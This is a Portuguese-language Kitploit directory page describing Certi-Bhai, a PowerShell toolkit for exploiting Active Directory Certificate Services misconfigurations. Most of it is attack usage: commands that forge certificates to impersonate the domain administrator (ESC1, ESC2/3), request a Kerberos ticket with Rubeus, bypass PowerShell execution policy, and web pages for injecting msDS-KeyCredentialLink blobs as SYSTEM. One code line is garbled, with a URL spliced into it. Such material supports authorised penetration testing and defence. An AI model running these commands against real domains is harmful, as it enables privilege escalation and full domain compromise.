Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Certi-Bhai — # Conteúdo relacionado à exploração de AD CS vai aqui | Kitploit
Ferramentas/GitHubGitHub/incredibleindishell/certi-bhai
Escalada de PrivilégiosGeração de PayloadsExploraçãoPós-ExploraçãoTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubincredibleindishell/certi-bhai

Certi-Bhai

# Conteúdo relacionado à exploração de AD CS vai aqui

Ver Repositório
40342há 6 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Certi-Bhai: Kit de Exploração de AD CS

O Certi-Bhai é uma coleção abrangente de ferramentas de exploração em PowerShell para atacar vulnerabilidades dos Serviços de Certificados do Active Directory (AD CS). Este kit implementa vários Cenários de Escalonamento (ESCs) que demonstram configurações incorretas críticas de segurança em ambientes ADCS.

📋 Índice

  • Visão Geral
  • Estrutura de Diretórios
  • Pré-requisitos
  • Guia de Utilização
    • ESC1 - Modelo de Certificado Excessivamente Permissivo
    • ESC2/3 - Agente de Solicitação de Certificado
    • ESC15 - Inscrição Web Vulnerável
    • Geração de CSR
    • Escalonamento de Privilégios no IIS

🎯 Visão Geral

Os Serviços de Certificados do Active Directory (AD CS) são frequentemente configurados incorretamente, criando múltiplos vetores de ataque. O Certi-Bhai fornece scripts e utilitários práticos de exploração para testes de segurança e pesquisa de vulnerabilidades comuns do ADCS.

Use com responsabilidade e apenas em ambientes de teste autorizados.


✅ Pré-requisitos

  • Windows 7 / Windows Server 2008 ou posterior
  • PowerShell 3.0+
  • Sistema associado ao domínio do Active Directory
  • Permissões apropriadas para solicitar certificados
  • Acesso à infraestrutura AD CS
  • .NET Framework 3.5+ (para scripts ASP.NET)

Módulos Necessários

root@kitploit:~
# Módulo Active Directory (opcional, para funcionalidade aprimorada)
Import-Module ActiveDirectory

🚀 Guia de Utilização

ESC1: Modelo de Certificado Excessivamente Permissivo

Vulnerabilidade: Os modelos de certificado permitem a inscrição com valores arbitrários de SubjectAltName (SAN).

O que faz: Cria um certificado assinado por um modelo excessivamente permissivo, permitindo que você se passe por qualquer usuário ou computador no domínio.

Utilização:

root@kitploit:~
# Navegue até o diretório ESC1
cd ESC1

# Execute o script de exploração
.
\esc1.ps1 -subjectName "CN=administrator,CN=Users,DC=indishell,DC=lab" `
           -templateName "vuln" `
           -altName "administrator" `
           -pfxPass "password123"

Parâmetros:

  • -subjectName: Nome distinto completo (DN) do usuário alvo
  • -templateName: Nome do modelo de certificado vulnerável
  • -altName: Nome alternativo a solicitar (nome de usuário/computador)
  • -pfxPass: Senha para exportação PFX

Saída: Certificado PFX codificado em Base64 para uso com ferramentas como Rubeus

Tutorial em Vídeo: https://www.youtube.com/watch?v=l0gMw_mO4dw


ESC2/3: Abuso de Agente de Solicitação de Certificado para Qualquer Finalidade

Vulnerabilidade: Os Agentes de Solicitação de Certificado podem solicitar certificados em nome de qualquer usuário.

O que faz: Inscreve um certificado como Agente de Solicitação de Certificado e, em seguida, solicita certificados para entidades arbitrárias.

Utilização:

root@kitploit:~
# Navegue até o diretório ESC3
cd ESC3

# Execute o script de exploração
.
\esc3_working.ps1 -templateName "CEOTemplate" `
                   -target_user "administrator" `
                   -domain "INDISHELL" `
                   -pfxPass "password123"

Parâmetros:

  • -templateName: Modelo de agente de solicitação vulnerável
  • -target_user: Entidade para a qual solicitar o certificado
  • -domain: Nome do domínio
  • -pfxPass: Senha do PFX

Saída: Certificado de administrador (PFX) com codificação base64

Tutorial em Vídeo: https://www.youtube.com/watch?v=fGjrM-JKnoM


ESC15: Modelo de Esquema Versão 1 Configurado Incorretamente

Vulnerabilidade: Injeção de Política de Aplicação.


Geração e Gestão de CSR

Geração Rápida de CSR

root@kitploit:~
cd CSR_Generate

# Gere uma solicitação de assinatura de certificado
.
\csr_short.ps1 -subjectName "CN=admin,CN=Users,DC=domain,DC=local" `
                -altName "admin"

Submeter CSR à Autoridade de Certificação

root@kitploit:~
# Submeta CSR à AC
.
\csr_submit.ps1 -csr $csr `
                 -templateName "User" `
                 -caServer "ca-server.domain.local"

Escalonamento de Privilégios no IIS

Interface de Gestão de Certificados

A interface web cert.aspx fornece um formulário fácil de usar para solicitar um certificado ao endpoint RPC do AD CS:

root@kitploit:~
http://your-iis-server/cert.aspx

Interface de Atualização LDAP

Modifique atributos LDAP através da interface web. Este script é basicamente usado para executar a injeção de blob no atributo msDS-KeyCredentialLink:

root@kitploit:~
http://your-iis-server/ldap_update.aspx

Funcionalidades:

  • Filtragem de atributos LDAP
  • Capacidades de modificação de objetos
  • Execução no contexto de NT Authority\SYSTEM

Comandos de Referência Rápida

Para Exploração ESC1

root@kitploit:~
.
\ESC1/esc1.ps1 -subjectName "CN=admin,CN=Users,DC=indishell,DC=lab" `
                -templateName "User" `
                -altName "administrator" `
                -pfxPass "P@ssw0rd!"

Para Pós-Exploração ESC2/3

root@kitploit:~
# Converta PFX para formato utilizável no Rubeus
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2("cert.pfx", "password")
[Convert]:https://raw.githubusercontent.com/incredibleindishell/certi-bhai/main/:ToBase64String($cert.RawData)

Solicitar TGT com Rubeus

root@kitploit:~
Rubeus.exe asktgt /user:administrator /certificate:$base64cert /nowrap

🔧 Resolução de Problemas

Problemas Comuns

P: A execução do script está bloqueada

root@kitploit:~
# Execute o PowerShell como Administrador
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process

P: Modelo de certificado não encontrado

  • Verifique se o nome do modelo está correto
  • Garanta que você tem permissões para solicitar do modelo
  • Verifique os registros da Autoridade de Certificação

P: A conexão LDAP falha

  • Verifique a conectividade do domínio
  • Verifique as credenciais
  • Confirme o acesso ADSI

📝 Detalhes Técnicos

Processo de Solicitação de Certificado

  1. Gere a chave privada (RSA de 2048 bits)
  2. Crie a solicitação de certificado (PKCS#10)
  3. Defina o nome do sujeito e as extensões
  4. Submeta à Autoridade de Certificação
  5. Recupere o certificado emitido
  6. Exporte como PFX com senha

🤝 Contribuição

Encontrou um problema ou tem melhorias? Por favor, reporte com responsabilidade.


Baixar ferramenta